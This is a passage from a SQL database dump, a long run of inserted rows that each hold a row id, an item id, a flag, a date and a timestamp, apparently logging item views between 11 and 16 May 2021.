13:26:16'),(21114,2457,1,'2021-05-11','2021-05-11 13:46:47'),(21115,1594,1,'2021-05-11','2021-05-11 14:12:40'),(21116,76,1,'2021-05-11','2021-05-11 14:13:56'),(21117,91,1,'2021-05-11','2021-05-11 14:14:50'),(21118,68,1,'2021-05-11','2021-05-11 14:45:34'),(21119,474,1,'2021-05-11','2021-05-11 14:52:42'),(21120,473,1,'2021-05-11','2021-05-11 14:53:04'),(21121,1608,1,'2021-05-11','2021-05-11 14:55:08'),(21122,1608,1,'2021-05-11','2021-05-11 14:55:08'),(21123,1608,1,'2021-05-11','2021-05-11 14:55:10'),(21124,2457,1,'2021-05-11','2021-05-11 15:29:04'),(21125,1588,1,'2021-05-11','2021-05-11 15:44:39'),(21126,68,1,'2021-05-11','2021-05-11 15:45:13'),(21127,2457,1,'2021-05-11','2021-05-11 15:51:46'),(21128,1586,1,'2021-05-11','2021-05-11 15:53:32'),(21129,68,1,'2021-05-11','2021-05-11 16:18:45'),(21130,91,1,'2021-05-11','2021-05-11 16:40:27'),(21131,1600,1,'2021-05-11','2021-05-11 16:56:49'),(21132,1602,1,'2021-05-11','2021-05-11 17:32:26'),(21133,478,1,'2021-05-11','2021-05-11 18:31:43'),(21134,1778,1,'2021-05-11','2021-05-11 18:49:27'),(21135,91,1,'2021-05-11','2021-05-11 19:04:35'),(21136,2503,1,'2021-05-11','2021-05-11 19:07:38'),(21137,89,1,'2021-05-11','2021-05-11 19:10:28'),(21138,3041,1,'2021-05-11','2021-05-11 19:13:12'),(21139,89,1,'2021-05-11','2021-05-11 19:14:21'),(21140,2769,1,'2021-05-11','2021-05-11 19:14:53'),(21141,2775,1,'2021-05-11','2021-05-11 19:15:34'),(21142,2769,1,'2021-05-11','2021-05-11 19:16:29'),(21143,1776,1,'2021-05-11','2021-05-11 19:49:30'),(21144,1600,1,'2021-05-11','2021-05-11 20:13:55'),(21145,1745,1,'2021-05-11','2021-05-11 20:14:31'),(21146,87,1,'2021-05-11','2021-05-11 20:15:54'),(21147,1745,1,'2021-05-11','2021-05-11 20:16:30'),(21148,1600,1,'2021-05-11','2021-05-11 20:16:50'),(21149,1594,1,'2021-05-11','2021-05-11 20:16:58'),(21150,1770,1,'2021-05-11','2021-05-11 20:17:18'),(21151,1598,1,'2021-05-11','2021-05-11 20:35:06'),(21152,1594,1,'2021-05-11','2021-05-11 20:40:45'),(21153,2769,1,'2021-05-11','2021-05-11 21:08:06'),(21154,89,1,'2021-05-11','2021-05-11 21:28:38'),(21155,1598,1,'2021-05-11','2021-05-11 23:24:59'),(21156,3030,1,'2021-05-11','2021-05-11 23:48:54'),(21157,1586,1,'2021-05-12','2021-05-12 00:25:28'),(21158,1586,1,'2021-05-12','2021-05-12 00:26:07'),(21159,1586,1,'2021-05-12','2021-05-12 00:26:39'),(21160,1600,1,'2021-05-12','2021-05-12 00:39:57'),(21161,68,1,'2021-05-12','2021-05-12 01:40:07'),(21162,3030,1,'2021-05-12','2021-05-12 02:00:20'),(21163,2911,1,'2021-05-12','2021-05-12 02:20:34'),(21164,89,1,'2021-05-12','2021-05-12 04:49:52'),(21165,1600,1,'2021-05-12','2021-05-12 04:56:20'),(21166,1600,1,'2021-05-12','2021-05-12 04:56:56'),(21167,3109,1,'2021-05-12','2021-05-12 05:31:32'),(21168,80,1,'2021-05-12','2021-05-12 06:31:07'),(21169,1602,1,'2021-05-12','2021-05-12 07:12:16'),(21170,1594,1,'2021-05-12','2021-05-12 07:33:05'),(21171,80,1,'2021-05-12','2021-05-12 07:33:12'),(21172,80,1,'2021-05-12','2021-05-12 07:33:26'),(21173,1594,1,'2021-05-12','2021-05-12 07:33:43'),(21174,570,1,'2021-05-12','2021-05-12 07:52:04'),(21175,1598,1,'2021-05-12','2021-05-12 08:03:05'),(21176,2964,1,'2021-05-12','2021-05-12 08:03:31'),(21177,2964,1,'2021-05-12','2021-05-12 08:04:39'),(21178,91,1,'2021-05-12','2021-05-12 08:09:51'),(21179,80,1,'2021-05-12','2021-05-12 08:10:39'),(21180,80,1,'2021-05-12','2021-05-12 08:14:35'),(21181,80,1,'2021-05-12','2021-05-12 08:18:53'),(21182,80,1,'2021-05-12','2021-05-12 08:33:48'),(21183,89,1,'2021-05-12','2021-05-12 08:34:53'),(21184,80,1,'2021-05-12','2021-05-12 08:38:29'),(21185,80,1,'2021-05-12','2021-05-12 08:40:36'),(21186,469,1,'2021-05-12','2021-05-12 09:29:54'),(21187,3030,1,'2021-05-12','2021-05-12 09:57:34'),(21188,1602,1,'2021-05-12','2021-05-12 10:12:30'),(21189,1588,1,'2021-05-12','2021-05-12 10:48:09'),(21190,1612,1,'2021-05-12','2021-05-12 10:57:41'),(21191,80,1,'2021-05-12','2021-05-12 11:20:08'),(21192,80,1,'2021-05-12','2021-05-12 11:31:53'),(21193,1582,1,'2021-05-12','2021-05-12 11:52:46'),(21194,80,1,'2021-05-12','2021-05-12 11:53:33'),(21195,80,1,'2021-05-12','2021-05-12 11:54:52'),(21196,80,1,'2021-05-12','2021-05-12 11:55:36'),(21197,474,1,'2021-05-12','2021-05-12 11:57:19'),(21198,2457,1,'2021-05-12','2021-05-12 12:42:06'),(21199,91,1,'2021-05-12','2021-05-12 12:43:06'),(21200,1582,1,'2021-05-12','2021-05-12 12:50:07'),(21201,3265,1,'2021-05-12','2021-05-12 12:57:19'),(21202,3030,1,'2021-05-12','2021-05-12 13:38:38'),(21203,3313,1,'2021-05-12','2021-05-12 13:39:30'),(21204,3030,1,'2021-05-12','2021-05-12 14:05:12'),(21205,1602,1,'2021-05-12','2021-05-12 14:23:13'),(21206,1588,1,'2021-05-12','2021-05-12 14:30:01'),(21207,2558,1,'2021-05-12','2021-05-12 14:31:37'),(21208,3066,1,'2021-05-12','2021-05-12 14:37:05'),(21209,1586,1,'2021-05-12','2021-05-12 14:46:51'),(21210,3282,1,'2021-05-12','2021-05-12 14:53:47'),(21211,76,1,'2021-05-12','2021-05-12 14:55:02'),(21212,72,1,'2021-05-12','2021-05-12 14:58:04'),(21213,2558,1,'2021-05-12','2021-05-12 15:03:07'),(21214,3030,1,'2021-05-12','2021-05-12 15:03:11'),(21215,1594,1,'2021-05-12','2021-05-12 15:03:55'),(21216,3707,1,'2021-05-12','2021-05-12 15:04:45'),(21217,72,1,'2021-05-12','2021-05-12 15:05:52'),(21218,3706,1,'2021-05-12','2021-05-12 15:05:59'),(21219,72,1,'2021-05-12','2021-05-12 15:08:25'),(21220,68,1,'2021-05-12','2021-05-12 15:08:45'),(21221,89,1,'2021-05-12','2021-05-12 15:12:59'),(21222,2704,1,'2021-05-12','2021-05-12 15:16:19'),(21223,1602,1,'2021-05-12','2021-05-12 15:16:39'),(21224,89,1,'2021-05-12','2021-05-12 15:16:59'),(21225,1612,1,'2021-05-12','2021-05-12 15:17:30'),(21226,89,1,'2021-05-12','2021-05-12 15:18:06'),(21227,1600,1,'2021-05-12','2021-05-12 15:19:01'),(21228,68,1,'2021-05-12','2021-05-12 15:19:22'),(21229,76,1,'2021-05-12','2021-05-12 15:19:46'),(21230,1602,1,'2021-05-12','2021-05-12 15:19:58'),(21231,1715,1,'2021-05-12','2021-05-12 15:21:26'),(21232,80,1,'2021-05-12','2021-05-12 15:50:54'),(21233,80,1,'2021-05-12','2021-05-12 15:56:24'),(21234,3087,1,'2021-05-12','2021-05-12 16:07:19'),(21235,1594,1,'2021-05-12','2021-05-12 16:13:53'),(21236,1594,1,'2021-05-12','2021-05-12 16:30:09'),(21237,1598,1,'2021-05-12','2021-05-12 16:47:38'),(21238,1602,1,'2021-05-12','2021-05-12 16:53:27'),(21239,1602,1,'2021-05-12','2021-05-12 16:56:46'),(21240,1602,1,'2021-05-12','2021-05-12 16:58:25'),(21241,1586,1,'2021-05-12','2021-05-12 17:10:54'),(21242,1586,1,'2021-05-12','2021-05-12 17:23:11'),(21243,1610,1,'2021-05-12','2021-05-12 17:30:50'),(21244,1610,1,'2021-05-12','2021-05-12 17:32:01'),(21245,91,1,'2021-05-12','2021-05-12 17:57:31'),(21246,1592,1,'2021-05-12','2021-05-12 17:57:35'),(21247,1600,1,'2021-05-12','2021-05-12 18:01:38'),(21248,1743,1,'2021-05-12','2021-05-12 18:02:24'),(21249,1743,1,'2021-05-12','2021-05-12 18:09:03'),(21250,1586,1,'2021-05-12','2021-05-12 19:13:07'),(21251,91,1,'2021-05-12','2021-05-12 19:14:15'),(21252,84,1,'2021-05-12','2021-05-12 19:15:48'),(21253,91,1,'2021-05-12','2021-05-12 19:16:14'),(21254,1586,1,'2021-05-12','2021-05-12 19:16:16'),(21255,1598,1,'2021-05-12','2021-05-12 19:39:59'),(21256,1598,1,'2021-05-12','2021-05-12 19:40:01'),(21257,1598,1,'2021-05-12','2021-05-12 19:40:45'),(21258,1600,1,'2021-05-12','2021-05-12 21:28:30'),(21259,89,1,'2021-05-12','2021-05-12 21:46:47'),(21260,1602,1,'2021-05-12','2021-05-12 22:12:47'),(21261,1602,1,'2021-05-12','2021-05-12 22:13:50'),(21262,1602,1,'2021-05-12','2021-05-12 22:17:15'),(21263,1602,1,'2021-05-12','2021-05-12 22:19:03'),(21264,1592,1,'2021-05-12','2021-05-12 22:22:07'),(21265,89,1,'2021-05-12','2021-05-12 23:26:12'),(21266,1594,1,'2021-05-13','2021-05-13 01:21:52'),(21267,2775,1,'2021-05-13','2021-05-13 01:33:24'),(21268,2457,1,'2021-05-13','2021-05-13 02:31:57'),(21269,2248,1,'2021-05-13','2021-05-13 03:31:43'),(21270,3265,1,'2021-05-13','2021-05-13 04:01:46'),(21271,1594,1,'2021-05-13','2021-05-13 04:56:13'),(21272,1594,1,'2021-05-13','2021-05-13 04:56:16'),(21273,1594,1,'2021-05-13','2021-05-13 04:57:10'),(21274,3261,1,'2021-05-13','2021-05-13 05:01:49'),(21275,89,1,'2021-05-13','2021-05-13 07:19:07'),(21276,478,1,'2021-05-13','2021-05-13 08:32:43'),(21277,1602,1,'2021-05-13','2021-05-13 08:42:03'),(21278,2309,1,'2021-05-13','2021-05-13 08:51:05'),(21279,2159,1,'2021-05-13','2021-05-13 08:57:19'),(21280,1586,1,'2021-05-13','2021-05-13 08:58:07'),(21281,1586,1,'2021-05-13','2021-05-13 08:58:27'),(21282,1588,1,'2021-05-13','2021-05-13 09:00:37'),(21283,91,1,'2021-05-13','2021-05-13 09:01:05'),(21284,68,1,'2021-05-13','2021-05-13 09:02:44'),(21285,1606,1,'2021-05-13','2021-05-13 09:04:57'),(21286,487,1,'2021-05-13','2021-05-13 09:05:15'),(21287,76,1,'2021-05-13','2021-05-13 09:05:24'),(21288,471,1,'2021-05-13','2021-05-13 09:05:37'),(21289,469,1,'2021-05-13','2021-05-13 09:06:27'),(21290,473,1,'2021-05-13','2021-05-13 09:07:19'),(21291,1606,1,'2021-05-13','2021-05-13 09:07:44'),(21292,473,1,'2021-05-13','2021-05-13 09:08:01'),(21293,469,1,'2021-05-13','2021-05-13 09:08:03'),(21294,471,1,'2021-05-13','2021-05-13 09:08:08'),(21295,68,1,'2021-05-13','2021-05-13 09:08:12'),(21296,91,1,'2021-05-13','2021-05-13 09:08:15'),(21297,1588,1,'2021-05-13','2021-05-13 09:08:18'),(21298,1606,1,'2021-05-13','2021-05-13 09:10:07'),(21299,1588,1,'2021-05-13','2021-05-13 09:50:42'),(21300,1586,1,'2021-05-13','2021-05-13 09:59:57'),(21301,1586,1,'2021-05-13','2021-05-13 09:59:59'),(21302,2704,1,'2021-05-13','2021-05-13 10:04:28'),(21303,108,1,'2021-05-13','2021-05-13 10:05:45'),(21304,91,1,'2021-05-13','2021-05-13 10:06:29'),(21305,1544,1,'2021-05-13','2021-05-13 11:15:28'),(21306,2159,1,'2021-05-13','2021-05-13 11:42:28'),(21307,1598,1,'2021-05-13','2021-05-13 11:59:16'),(21308,3226,1,'2021-05-13','2021-05-13 12:06:01'),(21309,3285,1,'2021-05-13','2021-05-13 12:46:09'),(21310,2156,1,'2021-05-13','2021-05-13 13:16:07'),(21311,1596,1,'2021-05-13','2021-05-13 13:25:03'),(21312,1606,1,'2021-05-13','2021-05-13 13:26:08'),(21313,1596,1,'2021-05-13','2021-05-13 13:29:41'),(21314,2704,1,'2021-05-13','2021-05-13 13:55:31'),(21315,3307,1,'2021-05-13','2021-05-13 13:56:28'),(21316,80,1,'2021-05-13','2021-05-13 14:06:33'),(21317,68,1,'2021-05-13','2021-05-13 14:08:50'),(21318,87,1,'2021-05-13','2021-05-13 14:11:15'),(21319,1602,1,'2021-05-13','2021-05-13 14:13:02'),(21320,76,1,'2021-05-13','2021-05-13 14:14:31'),(21321,470,1,'2021-05-13','2021-05-13 14:17:06'),(21322,471,1,'2021-05-13','2021-05-13 14:17:47'),(21323,91,1,'2021-05-13','2021-05-13 14:18:39'),(21324,1592,1,'2021-05-13','2021-05-13 14:21:59'),(21325,3069,1,'2021-05-13','2021-05-13 14:26:52'),(21326,68,1,'2021-05-13','2021-05-13 14:28:10'),(21327,2704,1,'2021-05-13','2021-05-13 14:34:35'),(21328,1602,1,'2021-05-13','2021-05-13 14:49:40'),(21329,1602,1,'2021-05-13','2021-05-13 14:55:43'),(21330,2297,1,'2021-05-13','2021-05-13 14:56:12'),(21331,2297,1,'2021-05-13','2021-05-13 14:59:39'),(21332,87,1,'2021-05-13','2021-05-13 15:49:53'),(21333,1711,1,'2021-05-13','2021-05-13 16:07:36'),(21334,1544,1,'2021-05-13','2021-05-13 16:07:41'),(21335,1594,1,'2021-05-13','2021-05-13 16:11:38'),(21336,570,1,'2021-05-13','2021-05-13 16:13:19'),(21337,1608,1,'2021-05-13','2021-05-13 16:14:58'),(21338,1608,1,'2021-05-13','2021-05-13 16:14:59'),(21339,1608,1,'2021-05-13','2021-05-13 16:15:03'),(21340,1608,1,'2021-05-13','2021-05-13 16:15:35'),(21341,1602,1,'2021-05-13','2021-05-13 16:16:59'),(21342,1602,1,'2021-05-13','2021-05-13 16:17:01'),(21343,1602,1,'2021-05-13','2021-05-13 16:17:07'),(21344,1608,1,'2021-05-13','2021-05-13 16:18:31'),(21345,1588,1,'2021-05-13','2021-05-13 16:27:31'),(21346,2457,1,'2021-05-13','2021-05-13 16:44:27'),(21347,1608,1,'2021-05-13','2021-05-13 16:51:48'),(21348,2457,1,'2021-05-13','2021-05-13 16:55:20'),(21349,1594,1,'2021-05-13','2021-05-13 18:04:54'),(21350,3251,1,'2021-05-13','2021-05-13 18:28:54'),(21351,74,1,'2021-05-13','2021-05-13 18:29:57'),(21352,1734,1,'2021-05-13','2021-05-13 18:43:54'),(21353,1600,1,'2021-05-13','2021-05-13 19:07:46'),(21354,1600,1,'2021-05-13','2021-05-13 19:07:47'),(21355,1600,1,'2021-05-13','2021-05-13 19:09:32'),(21356,335,1,'2021-05-13','2021-05-13 20:19:14'),(21357,1594,1,'2021-05-13','2021-05-13 20:52:58'),(21358,76,1,'2021-05-13','2021-05-13 22:36:01'),(21359,1594,1,'2021-05-13','2021-05-13 23:48:23'),(21360,2309,1,'2021-05-14','2021-05-14 00:15:28'),(21361,2309,1,'2021-05-14','2021-05-14 00:45:18'),(21362,1588,1,'2021-05-14','2021-05-14 01:54:15'),(21363,2609,1,'2021-05-14','2021-05-14 01:56:01'),(21364,2609,1,'2021-05-14','2021-05-14 01:57:41'),(21365,2609,1,'2021-05-14','2021-05-14 02:40:11'),(21366,2804,1,'2021-05-14','2021-05-14 03:24:46'),(21367,1749,1,'2021-05-14','2021-05-14 03:34:59'),(21368,80,1,'2021-05-14','2021-05-14 03:55:10'),(21369,3290,1,'2021-05-14','2021-05-14 04:05:11'),(21370,3694,1,'2021-05-14','2021-05-14 04:25:03'),(21371,478,1,'2021-05-14','2021-05-14 05:23:18'),(21372,478,1,'2021-05-14','2021-05-14 05:53:17'),(21373,3313,1,'2021-05-14','2021-05-14 05:55:28'),(21374,570,1,'2021-05-14','2021-05-14 06:05:28'),(21375,1614,1,'2021-05-14','2021-05-14 06:35:19'),(21376,80,1,'2021-05-14','2021-05-14 06:45:25'),(21377,1737,1,'2021-05-14','2021-05-14 07:25:29'),(21378,3045,1,'2021-05-14','2021-05-14 07:35:58'),(21379,3104,1,'2021-05-14','2021-05-14 08:06:13'),(21380,3534,1,'2021-05-14','2021-05-14 08:15:59'),(21381,1600,1,'2021-05-14','2021-05-14 08:36:05'),(21382,1600,1,'2021-05-14','2021-05-14 08:50:54'),(21383,2395,1,'2021-05-14','2021-05-14 08:56:00'),(21384,2804,1,'2021-05-14','2021-05-14 09:32:08'),(21385,2804,1,'2021-05-14','2021-05-14 09:32:12'),(21386,1582,1,'2021-05-14','2021-05-14 09:36:49'),(21387,1594,1,'2021-05-14','2021-05-14 09:48:49'),(21388,1594,1,'2021-05-14','2021-05-14 09:50:02'),(21389,1592,1,'2021-05-14','2021-05-14 09:57:27'),(21390,1588,1,'2021-05-14','2021-05-14 10:05:30'),(21391,1604,1,'2021-05-14','2021-05-14 10:37:56'),(21392,2704,1,'2021-05-14','2021-05-14 10:59:34'),(21393,1586,1,'2021-05-14','2021-05-14 11:08:14'),(21394,570,1,'2021-05-14','2021-05-14 11:18:09'),(21395,2804,1,'2021-05-14','2021-05-14 12:08:28'),(21396,1596,1,'2021-05-14','2021-05-14 12:28:48'),(21397,1598,1,'2021-05-14','2021-05-14 12:36:20'),(21398,1594,1,'2021-05-14','2021-05-14 13:30:44'),(21399,2751,1,'2021-05-14','2021-05-14 13:59:12'),(21400,3261,1,'2021-05-14','2021-05-14 14:00:27'),(21401,335,1,'2021-05-14','2021-05-14 14:09:34'),(21402,2991,1,'2021-05-14','2021-05-14 14:18:45'),(21403,1594,1,'2021-05-14','2021-05-14 15:19:29'),(21404,1588,1,'2021-05-14','2021-05-14 15:33:34'),(21405,1588,1,'2021-05-14','2021-05-14 15:34:01'),(21406,1588,1,'2021-05-14','2021-05-14 15:34:22'),(21407,1588,1,'2021-05-14','2021-05-14 15:35:21'),(21408,1614,1,'2021-05-14','2021-05-14 15:49:47'),(21409,1582,1,'2021-05-14','2021-05-14 15:58:42'),(21410,1588,1,'2021-05-14','2021-05-14 16:00:36'),(21411,80,1,'2021-05-14','2021-05-14 16:10:00'),(21412,3087,1,'2021-05-14','2021-05-14 16:11:47'),(21413,1582,1,'2021-05-14','2021-05-14 16:13:38'),(21414,3261,1,'2021-05-14','2021-05-14 17:10:09'),(21415,1602,1,'2021-05-14','2021-05-14 17:19:29'),(21416,3055,1,'2021-05-14','2021-05-14 17:59:39'),(21417,1600,1,'2021-05-14','2021-05-14 18:00:07'),(21418,2309,1,'2021-05-14','2021-05-14 18:11:33'),(21419,1606,1,'2021-05-14','2021-05-14 18:38:54'),(21420,74,1,'2021-05-14','2021-05-14 18:39:38'),(21421,3030,1,'2021-05-14','2021-05-14 18:40:38'),(21422,91,1,'2021-05-14','2021-05-14 18:40:42'),(21423,2704,1,'2021-05-14','2021-05-14 18:41:19'),(21424,80,1,'2021-05-14','2021-05-14 18:41:28'),(21425,1582,1,'2021-05-14','2021-05-14 19:01:05'),(21426,3127,1,'2021-05-14','2021-05-14 19:10:50'),(21427,1612,1,'2021-05-14','2021-05-14 19:20:52'),(21428,469,1,'2021-05-14','2021-05-14 19:30:48'),(21429,1586,1,'2021-05-14','2021-05-14 20:32:36'),(21430,1586,1,'2021-05-14','2021-05-14 20:41:28'),(21431,1596,1,'2021-05-14','2021-05-14 21:01:22'),(21432,2609,1,'2021-05-14','2021-05-14 21:11:56'),(21433,2609,1,'2021-05-14','2021-05-14 21:11:58'),(21434,2609,1,'2021-05-14','2021-05-14 21:20:36'),(21435,2609,1,'2021-05-14','2021-05-14 21:21:26'),(21436,2609,1,'2021-05-14','2021-05-14 21:29:28'),(21437,2804,1,'2021-05-14','2021-05-14 21:31:40'),(21438,1602,1,'2021-05-14','2021-05-14 21:51:52'),(21439,1604,1,'2021-05-14','2021-05-14 22:01:52'),(21440,1602,1,'2021-05-14','2021-05-14 22:38:58'),(21441,76,1,'2021-05-14','2021-05-14 22:39:38'),(21442,3045,1,'2021-05-14','2021-05-14 22:41:59'),(21443,1602,1,'2021-05-14','2021-05-14 23:02:14'),(21444,1594,1,'2021-05-14','2021-05-14 23:08:14'),(21445,1588,1,'2021-05-14','2021-05-14 23:13:47'),(21446,2609,1,'2021-05-14','2021-05-14 23:22:01'),(21447,1600,1,'2021-05-14','2021-05-14 23:52:05'),(21448,570,1,'2021-05-15','2021-05-15 00:22:37'),(21449,80,1,'2021-05-15','2021-05-15 00:33:40'),(21450,1614,1,'2021-05-15','2021-05-15 00:53:41'),(21451,80,1,'2021-05-15','2021-05-15 01:22:35'),(21452,3005,1,'2021-05-15','2021-05-15 01:36:20'),(21453,2769,1,'2021-05-15','2021-05-15 01:42:25'),(21454,2309,1,'2021-05-15','2021-05-15 02:02:20'),(21455,2457,1,'2021-05-15','2021-05-15 02:12:04'),(21456,2769,1,'2021-05-15','2021-05-15 02:13:03'),(21457,1749,1,'2021-05-15','2021-05-15 02:42:30'),(21458,3066,1,'2021-05-15','2021-05-15 03:54:28'),(21459,3066,1,'2021-05-15','2021-05-15 03:58:08'),(21460,3030,1,'2021-05-15','2021-05-15 06:53:43'),(21461,1614,1,'2021-05-15','2021-05-15 06:57:07'),(21462,1614,1,'2021-05-15','2021-05-15 06:57:49'),(21463,1586,1,'2021-05-15','2021-05-15 07:34:33'),(21464,1600,1,'2021-05-15','2021-05-15 08:07:06'),(21465,1582,1,'2021-05-15','2021-05-15 08:18:10'),(21466,1715,1,'2021-05-15','2021-05-15 09:01:19'),(21467,1715,1,'2021-05-15','2021-05-15 09:03:21'),(21468,1600,1,'2021-05-15','2021-05-15 09:25:16'),(21469,1772,1,'2021-05-15','2021-05-15 09:28:05'),(21470,2609,1,'2021-05-15','2021-05-15 09:30:57'),(21471,2165,1,'2021-05-15','2021-05-15 09:35:25'),(21472,2150,1,'2021-05-15','2021-05-15 09:41:09'),(21473,2152,1,'2021-05-15','2021-05-15 09:42:54'),(21474,2063,1,'2021-05-15','2021-05-15 09:44:24'),(21475,1726,1,'2021-05-15','2021-05-15 09:46:36'),(21476,1722,1,'2021-05-15','2021-05-15 09:48:08'),(21477,1720,1,'2021-05-15','2021-05-15 09:50:09'),(21478,1713,1,'2021-05-15','2021-05-15 09:51:55'),(21479,1707,1,'2021-05-15','2021-05-15 09:58:08'),(21480,1697,1,'2021-05-15','2021-05-15 09:59:09'),(21481,1711,1,'2021-05-15','2021-05-15 10:00:32'),(21482,1715,1,'2021-05-15','2021-05-15 10:01:55'),(21483,2609,1,'2021-05-15','2021-05-15 10:03:56'),(21484,1724,1,'2021-05-15','2021-05-15 10:05:40'),(21485,1600,1,'2021-05-15','2021-05-15 10:13:33'),(21486,2971,1,'2021-05-15','2021-05-15 10:16:17'),(21487,87,1,'2021-05-15','2021-05-15 10:28:53'),(21488,1600,1,'2021-05-15','2021-05-15 10:30:18'),(21489,478,1,'2021-05-15','2021-05-15 10:31:01'),(21490,91,1,'2021-05-15','2021-05-15 10:32:06'),(21491,1600,1,'2021-05-15','2021-05-15 10:41:40'),(21492,76,1,'2021-05-15','2021-05-15 10:46:56'),(21493,1600,1,'2021-05-15','2021-05-15 10:47:42'),(21494,3030,1,'2021-05-15','2021-05-15 11:43:37'),(21495,3290,1,'2021-05-15','2021-05-15 11:44:42'),(21496,3030,1,'2021-05-15','2021-05-15 11:45:26'),(21497,478,1,'2021-05-15','2021-05-15 12:01:14'),(21498,1600,1,'2021-05-15','2021-05-15 12:22:56'),(21499,1600,1,'2021-05-15','2021-05-15 12:22:56'),(21500,1600,1,'2021-05-15','2021-05-15 12:22:57'),(21501,108,1,'2021-05-15','2021-05-15 13:27:37'),(21502,1600,1,'2021-05-15','2021-05-15 13:34:17'),(21503,1600,1,'2021-05-15','2021-05-15 13:34:17'),(21504,1600,1,'2021-05-15','2021-05-15 13:34:17'),(21505,1592,1,'2021-05-15','2021-05-15 13:36:29'),(21506,1598,1,'2021-05-15','2021-05-15 14:16:28'),(21507,1594,1,'2021-05-15','2021-05-15 14:17:22'),(21508,91,1,'2021-05-15','2021-05-15 14:42:29'),(21509,76,1,'2021-05-15','2021-05-15 14:46:30'),(21510,3278,1,'2021-05-15','2021-05-15 14:47:24'),(21511,3278,1,'2021-05-15','2021-05-15 14:53:36'),(21512,3691,1,'2021-05-15','2021-05-15 14:58:15'),(21513,1715,1,'2021-05-15','2021-05-15 15:05:53'),(21514,3109,1,'2021-05-15','2021-05-15 15:17:32'),(21515,1770,1,'2021-05-15','2021-05-15 18:15:51'),(21516,1606,1,'2021-05-15','2021-05-15 18:29:03'),(21517,2704,1,'2021-05-15','2021-05-15 18:35:06'),(21518,2704,1,'2021-05-15','2021-05-15 18:35:08'),(21519,2704,1,'2021-05-15','2021-05-15 18:35:23'),(21520,1770,1,'2021-05-15','2021-05-15 18:36:05'),(21521,2704,1,'2021-05-15','2021-05-15 18:36:06'),(21522,1594,1,'2021-05-15','2021-05-15 18:45:11'),(21523,1588,1,'2021-05-15','2021-05-15 19:10:26'),(21524,1594,1,'2021-05-15','2021-05-15 19:45:42'),(21525,1602,1,'2021-05-15','2021-05-15 19:46:20'),(21526,1586,1,'2021-05-15','2021-05-15 19:57:10'),(21527,1586,1,'2021-05-15','2021-05-15 19:58:26'),(21528,1586,1,'2021-05-15','2021-05-15 20:07:34'),(21529,1586,1,'2021-05-15','2021-05-15 20:12:36'),(21530,1586,1,'2021-05-15','2021-05-15 20:14:55'),(21531,1602,1,'2021-05-15','2021-05-15 20:23:38'),(21532,1594,1,'2021-05-15','2021-05-15 22:14:10'),(21533,1600,1,'2021-05-15','2021-05-15 22:55:55'),(21534,1594,1,'2021-05-16','2021-05-16 00:53:21'),(21535,1594,1,'2021-05-16','2021-05-16 00:53:22'),(21536,2609,1,'2021-05-16','2021-05-16 01:12:17'),(21537,1606,1,'2021-05-16','2021-05-16 01:12:20'),(21538,76,1,'2021-05-16','2021-05-16 04:30:25'),(21539,68,1,'2021-05-16','2021-05-16 04:30:34'),(21540,76,1,'2021-05-16','2021-05-16 04:32:21'),(21541,1594,1,'2021-05-16','2021-05-16 05:02:11'),(21542,1594,1,'2021-05-16','2021-05-16 05:10:59'),(21543,1586,1,'2021-05-16','2021-05-16 05:13:44'),(21544,1586,1,'2021-05-16','2021-05-16 05:13:46'),(21545,1586,1,'2021-05-16','2021-05-16 05:13:47'),(21546,1586,1,'2021-05-16','2021-05-16 05:16:45'),(21547,2617,1,'2021-05-16','2021-05-16 05:17:08'),(21548,2617,1,'2021-05-16','2021-05-16 05:17:09'),(21549,2617,1,'2021-05-16','2021-05-16 05:20:08'),(21550,2503,1,'2021-05-16','2021-05-16 05:20:51'),(21551,2503,1,'2021-05-16','2021-05-16 05:20:51'),(21552,2809,1,'2021-05-16','2021-05-16 05:55:12'),(21553,2809,1,'2021-05-16','2021-05-16 05:55:13'),(21554,2809,1,'2021-05-16','2021-05-16 05:55:15'),(21555,1586,1,'2021-05-16','2021-05-16 05:56:27'),(21556,1586,1,'2021-05-16','2021-05-16 05:56:28'),(21557,1582,1,'2021-05-16','2021-05-16 05:59:53'),(21558,1582,1,'2021-05-16','2021-05-16 05:59:54'),(21559,91,1,'2021-05-16','2021-05-16 06:09:11'),(21560,2159,1,'2021-05-16','2021-05-16 06:39:44'),(21561,1544,1,'2021-05-16','2021-05-16 07:03:30'),(21562,89,1,'2021-05-16','2021-05-16 07:15:16'),(21563,1614,1,'2021-05-16','2021-05-16 07:16:22'),(21564,1582,1,'2021-05-16','2021-05-16 07:18:55'),(21565,1544,1,'2021-05-16','2021-05-16 07:19:03'),(21566,2457,1,'2021-05-16','2021-05-16 07:19:04'),(21567,1544,1,'2021-05-16','2021-05-16 07:19:53'),(21568,1606,1,'2021-05-16','2021-05-16 07:23:01'),(21569,478,1,'2021-05-16','2021-05-16 07:41:06'),(21570,3109,1,'2021-05-16','2021-05-16 07:51:08'),(21571,478,1,'2021-05-16','2021-05-16 08:10:03'),(21572,3099,1,'2021-05-16','2021-05-16 08:35:36'),(21573,3099,1,'2021-05-16','2021-05-16 08:36:53'),(21574,1606,1,'2021-05-16','2021-05-16 09:06:32'),(21575,80,1,'2021-05-16','2021-05-16 09:06:47'),(21576,3102,1,'2021-05-16','2021-05-16 11:09:22'),(21577,1594,1,'2021-05-16','2021-05-16 11:12:08'),(21578,1600,1,'2021-05-16','2021-05-16 12:20:40'),(21579,1594,1,'2021-05-16','2021-05-16 12:43:18'),(21580,1594,1,'2021-05-16','2021-05-16 12:43:18'),(21581,1594,1,'2021-05-16','2021-05-16 12:43:21'),(21582,1594,1,'2021-05-16','2021-05-16 12:47:11'),(21583,1594,1,'2021-05-16','2021-05-16 12:47:27'),(21584,80,1,'2021-05-16','2021-05-16 12:48:02'),(21585,1594,1,'2021-05-16','2021-05-16 12:58:31'),(21586,1606,1,'2021-05-16','2021-05-16 13:13:54'),(21587,1582,1,'2021-05-16','2021-05-16 13:30:31'),(21588,87,1,'2021-05-16','2021-05-16 13:32:52'),(21589,68,1,'2021-05-16','2021-05-16 13:33:17'),(21590,3261,1,'2021-05-16','2021-05-16 15:22:15'),(21591,3430,1,'2021-05-16','2021-05-16 15:53:58'),(21592,3430,1,'2021-05-16','2021-05-16 16:24:33'),(21593,2309,1,'2021-05-16','2021-05-16 16:48:46'),(21594,2309,1,'2021-05-16','2021-05-16 16:50:27'),(21595,1598,1,'2021-05-16','2021-05-16 17:01:49'),(21596,1598,1,'2021-05-16','2021-05-16 17:01:57'),(21597,1598,1,'2021-05-16','2021-05-16 17:03:53'),(21598,1598,1,'2021-05-16','2021-05-16 17:08:01'),(21599,80,1,'2021-05-16','2021-05-16 17:12:27'),(21600,3066,1,'2021-05-16','2021-05-16 